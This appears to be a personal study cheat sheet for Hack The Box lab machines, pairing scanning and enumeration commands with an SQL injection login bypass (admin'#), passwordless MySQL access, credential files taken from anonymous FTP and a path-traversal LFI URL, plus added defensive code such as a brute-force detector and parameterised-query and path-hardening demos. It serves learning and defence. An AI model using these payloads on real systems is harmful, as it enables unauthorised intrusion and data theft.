Unlike how hackers are portrayed in the media, we're not actually supposed to know everything off the top of our heads. A massive part of it is research skills, and I personally believe that problem solving is more important than memorising all the different commands in Linux. That's not only impossible, it also misses the point of what makes hacking fun.
That all said, it would be handy to have my toolbox ready for CTFs/pentesting so that I can go straight to executing my ideas.
Tier 1.
Appointment
Tools | Description
SQL Injection | exploits the web application to directly query any table in the SQL database behind the webserver
Anti-SQL Injection | input validation, parameterised queries, stored procedures, WAF (Web Application Firewall)
-sC | performs a script scan using the default set of NSE scripts (equivalent to --script=default); with no port list given, nmap scans the 1000 most common TCP ports. Some of the default scripts are considered intrusive and should not be run against a network without permission.
-sV | enables version detection, which identifies which service and version is running on each open port
sudo nmap -sC -sV {target IP}
Apache HTTP Server | a free and open-source web server that serves web pages from physical or virtual servers. Commonly found on ports 80/TCP, 443/TCP, 8080/TCP or 8000/TCP
HTTP | application-layer protocol that transmits HTML hypermedia documents
HTTP Responses | contain status codes, which describe how the server handled the client's request
Brute-force | submitting candidate values from a purpose-built list (the wordlist) one after another, in an attempt to guess the input that will be accepted so that access is gained
Gobuster | brute-forcing tool for web directories and files
go install github.com/OJ/gobuster/v3@latest | installs gobuster via the Go toolchain (Go must already be installed)
git clone https://github.com/OJ/gobuster.git | alternatively, fetch the source code to build it yourself
go get && go build | run inside the cloned folder; creates the gobuster binary there
go install | builds and places the binary in $GOPATH/bin
gobuster --help | help page
/usr/share/wordlists | wordlists, dictionaries and rainbow tables pre-installed in Parrot OS
SecLists download | https://github.com/danielmiessler/SecLists
git clone https://github.com/danielmiessler/SecLists | downloads SecLists
dir | specify that we wish to do web directory enumeration
--url | specify the web address of the target machine that runs the HTTP server
--wordlist | specify the wordlist that we want to use
gobuster dir --url http://{target IP}/ --wordlist {wordlist_location}/directory-list-2.3-small.txt
most common login combinations | admin:admin, guest:guest, user:user, root:root, administrator:password
Brute-forcing might sometimes trigger a security measure.
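Brute-forcing with a wordlist looks, from the server side, like a burst of requests for paths that don't exist. Here is an added example (my own code, not part of the original post) that reads Apache combined-format access log lines and flags source IPs that produced many 404 responses in a short window. The log lines, the user-agent strings, the 60-second window and the threshold of 20 are all constructed for illustration.

```python
"""Flag wordlist-driven directory brute-forcing in Apache combined-format access logs.

Added example; the log lines, window and threshold below are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["time"], TIME_FMT),
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_bruteforcers(lines, window=timedelta(seconds=60), threshold=20):
    """Return {ip: peak_404_count} for IPs with >= threshold 404s inside any one window."""
    not_found = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            not_found[rec["ip"]].append(rec["time"])
    flagged = {}
    for ip, times in not_found.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until the span is at most `window`.
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# --- constructed sample data (not real traffic) ---------------------------------
def _log_line(ip, seconds, path, status, agent):
    t = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc) + timedelta(seconds=seconds)
    return f'{ip} - - [{t.strftime(TIME_FMT)}] "GET {path} HTTP/1.1" {status} 312 "-" "{agent}"'


GUESSES = ["admin", "backup", "cgi-bin", "images", "old", "test", "tmp", "uploads"]
SAMPLE_LOG = [
    _log_line("203.0.113.5", i, f"/{GUESSES[i % len(GUESSES)]}{i}", 404, "constructed-scanner/1.0")
    for i in range(25)
] + [
    _log_line("198.51.100.7", 5, "/index.php", 200, "Mozilla/5.0"),
    _log_line("198.51.100.7", 40, "/login.php", 200, "Mozilla/5.0"),
    _log_line("198.51.100.7", 50, "/favicon.ico", 404, "Mozilla/5.0"),
]

if __name__ == "__main__":
    for ip, count in find_bruteforcers(SAMPLE_LOG).items():
        print(f"{ip}: {count} x 404 within 60s -> likely directory brute-force")
```

The sliding window matters more than a plain count: a real user hitting one stale link produces a single 404 over an afternoon, whereas a wordlist run produces dozens per second, so the threshold rarely needs tuning once the window is short.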
SQL Injection | a common way of exploiting web pages that use SQL statements to retrieve and store user input data.
ACE | Arbitrary Code Execution: running commands or code on a target machine or process.
Username: admin'#
Password: abc123
Here's why it works 😊 When we write this at the front-end, the single quote closes the username string and the # turns the rest of the statement into a comment.
This happens in the back-end 🤓 the query becomes something like SELECT * FROM users WHERE username='admin'#' AND password='abc123', so the password check is never evaluated and the admin row is returned.
That's why input validation is important!
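To make the front-end/back-end difference concrete, here is an added example (my own code, not from the original post) showing a login check built by string concatenation beside the parameterised version. It uses Python's built-in sqlite3 so it runs offline; SQLite's line comment is `--` where MySQL's is `#`, so the payload `admin'#` from above is written here as `admin'--`. The users table and passwords are constructed.

```python
"""Why admin'# logs in: string-built query versus parameterised query.

Added example, not from the original post. sqlite3 is used so the block runs offline;
its line comment is "--" where MySQL uses "#". Table contents are constructed.
"""
import sqlite3


def make_db():
    """Constructed users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('guest', 'guest')")
    return conn


def build_query_vulnerable(username, password):
    """The statement as the vulnerable back-end assembles it (shown for inspection)."""
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def login_vulnerable(conn, username, password):
    # The quote inside the username closes the string literal and the comment
    # marker discards everything after it, including the password comparison.
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterised query: values travel separately from the SQL text, so quote
    # and comment characters are just data and never change the statement.
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("back-end sees:", build_query_vulnerable("admin'--", "abc123"))
    print("vulnerable login ->", login_vulnerable(db, "admin'--", "abc123"))
    print("parameterised login ->", login_safe(db, "admin'--", "abc123"))
```

Note that no amount of escaping in the vulnerable function fixes the design; the parameterised form is what the Anti-SQL Injection row above refers to, and it works the same way with MySQL drivers.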
Sequel
Tools | Description
SQL Service | if the username and password match an entry in the database, the SQL service reports this back to the web application, which in turn logs the user in and gives them access to the restricted parts of the website. A session cookie is then stored locally in the browser and on the webserver.
sudo apt update && sudo apt install mysql* | installs the MySQL client and server on our local machine; MariaDB can be used instead
mysql --help | displays the help page
Deployment Stage Vulnerability | during deployment it is sometimes possible to have passwordless authentication so that personnel can easily interact with the service.
-h | connect to host
-u | user for log-in if not current user
$ mysql -h {target IP} -u root
SHOW databases; | prints out the databases we can access
USE {database_name}; | set to use the database named {database_name}
SHOW tables; | prints out the available tables inside the current database.
SELECT * FROM {table_name}; | prints out all the data from the table {table_name}
Query-oriented Language | this means that you supply it with one query at a time.
e.g. SHOW databases;
USE htb;
SHOW tables;
SELECT * FROM {table_name}; | sequentially checks for the table's content
Crocodile
Tools | Description
Misconfigured services are vulnerable.
Always start with enumerating the target
sudo nmap -sC -sV {target_ip} | you'll be using this a whole lot!
ftp-anon | anonymous FTP login allowed (FTP code 230)
ftp -h | help page
ftp {target_ip}
dir | lists the current directory
get | downloads a file
get allowed.userlist
get allowed.userlist.passwd
exit | terminates the FTP connection
cat allowed.userlist
cat allowed.userlist.passwd
540 This FTP server is anonymous only | returns if other credentials are attempted
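Since every box starts with the same `nmap -sC -sV` scan, it helps to pull the findings out of the output automatically. The following is an added example (my own code, not from the original post) that parses nmap's normal output into port records with their NSE script results and highlights the anonymous-FTP condition described above. `SAMPLE_NMAP` is constructed to resemble the scan output; the host, version strings and file sizes are made up.

```python
"""Triage nmap -sC -sV output: list open ports and flag the anonymous-FTP finding.

Added example, not from the original post. SAMPLE_NMAP is constructed to look like
nmap's normal output; the host, versions and file sizes are made up.
"""
import re

SAMPLE_NMAP = """\
Nmap scan report for 10.0.0.5
Host is up (0.020s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Example Company Site
Service Info: OS: Unix
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# First line of an NSE script result: "| name: text" or "|_name: text".
SCRIPT_RE = re.compile(r"^\|_?\s*(?P<name>[\w-]+):\s*(?P<text>.*)$")


def parse_nmap(text):
    """Return a list of port dicts, each carrying the NSE script results printed under it."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                "service": m["service"], "version": m["version"].strip(), "scripts": {},
            })
            continue
        m = SCRIPT_RE.match(line)
        if m and ports:
            # Script output belongs to the most recent port line.
            ports[-1]["scripts"][m["name"]] = m["text"]
    return ports


def findings(ports):
    """Turn parsed ports into the items worth acting on first."""
    out = []
    for p in ports:
        if p["state"] != "open":
            continue
        anon = p["scripts"].get("ftp-anon", "")
        if "login allowed" in anon.lower():
            out.append(f"{p['port']}/{p['proto']} ftp: anonymous login allowed ({p['version']}); "
                       "restrict or disable anonymous access and review what it exposes")
        if p["service"] == "http":
            title = p["scripts"].get("http-title", "no title")
            out.append(f"{p['port']}/{p['proto']} http: {p['version']} [{title}]")
    return out


if __name__ == "__main__":
    for item in findings(parse_nmap(SAMPLE_NMAP)):
        print(item)
```

Continuation lines of a script result (the directory listing under ftp-anon) are deliberately ignored by `SCRIPT_RE`, since only the first line carries the verdict; extend the parser if you want the listed file names as well.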
Wappalyzer | analyses the web page's code and returns the technologies used to build it, such as the webserver type, JavaScript libraries, etc.
gobuster dir --url http://{target_ip}/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
http://{target_ip}/login.php
Use the username and password here.
Responder
Tools | Description
-p- | this flag scans for all TCP ports ranging from 0-65535
--min-rate | used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
nmap -p- --min-rate 1000 -sV 10.129.128.223
Windows Remote Management / WinRM | a Windows-native, built-in remote management protocol that uses the Simple Object Access Protocol (SOAP) to interact with remote computers and servers, as well as their OS and applications.
echo "10.129.128.223 unika.htb" | sudo tee -a /etc/hosts
File Inclusion Vulnerability | dynamic websites build pages on the fly from information in the HTTP request (GET and POST parameters, cookies and other variables); when that request data decides which file gets included and is not validated, the requester can control what the server includes.
NTLM is a collection of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain.
Here I changed the site to French. Let's look into this and see if a Local File Inclusion (LFI) vulnerability is actually there.
Local File Inclusion (LFI) occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application.
Remote File Inclusion (RFI) is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc.
We can use this in the future to try to see if a site is vulnerable to LFI/RFI:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
WINDOWS\System32\drivers\etc\hosts
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
We know from here that LFI is possible, as we can view the contents of c:\windows\system32\drivers\etc\hosts.
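To show what separates the vulnerable `index.php?page=` handling from a safe one, here is an added example (my own code, not the site's source, which the write-up does not show) that resolves the `page` parameter two ways in Python: a naive join that the traversal payload walks straight out of, and a hardened resolver that allow-lists page names and then verifies the real path stays under the pages directory. The pages directory, the allow-list of page names and the PHP-include-like behaviour of the naive version are assumptions; no files need to exist because only path resolution is demonstrated.

```python
"""Resolving a ?page= parameter: traversal-vulnerable resolver beside a hardened one.

Added example, not from the original post. The pages directory, the allow-list and
the assumption that the naive version behaves like a PHP include of the raw
parameter are all constructed; nothing on disk is read.
"""
import os
import tempfile

# Assumed: the application only ever serves these static pages.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}
# Constructed pages directory (does not need to exist for this demonstration).
DEMO_BASE = os.path.join(tempfile.gettempdir(), "unika_pages_demo")
# The traversal value from the write-up above.
PAYLOAD = "../../../../../../../../windows/system32/drivers/etc/hosts"


def resolve_vulnerable(base_dir, page):
    """Joins the request value straight onto the pages directory (assumed include-like behaviour)."""
    return os.path.normpath(os.path.join(base_dir, page))


def resolve_hardened(base_dir, page):
    """Allow-list the name, then verify the real path is still under base_dir."""
    # 1. Exact match against known page names: traversal sequences, absolute paths
    #    and remote URLs (the RFI case) all fail this check.
    if page not in ALLOWED_PAGES:
        return None
    # 2. Defence in depth: even an allowed name must resolve inside base_dir
    #    (guards against a symlinked or mis-set pages directory).
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, page))
    if os.path.commonpath([real_base, candidate]) != real_base:
        return None
    return candidate


def escapes_base(base_dir, resolved):
    """True when a resolved path lies outside base_dir: the LFI condition."""
    real_base = os.path.realpath(base_dir)
    return os.path.commonpath([real_base, os.path.realpath(resolved)]) != real_base


if __name__ == "__main__":
    leaked = resolve_vulnerable(DEMO_BASE, PAYLOAD)
    print("vulnerable resolver ->", leaked, "| escapes base:", escapes_base(DEMO_BASE, leaked))
    print("hardened resolver   ->", resolve_hardened(DEMO_BASE, PAYLOAD))
    print("hardened, valid     ->", resolve_hardened(DEMO_BASE, "french.html"))
```

The allow-list does the real work; the `realpath`/`commonpath` check is there so that a deployment mistake (a symlink inside the pages directory, a wrong base path in config) still cannot turn a legitimate page name into a read outside the directory.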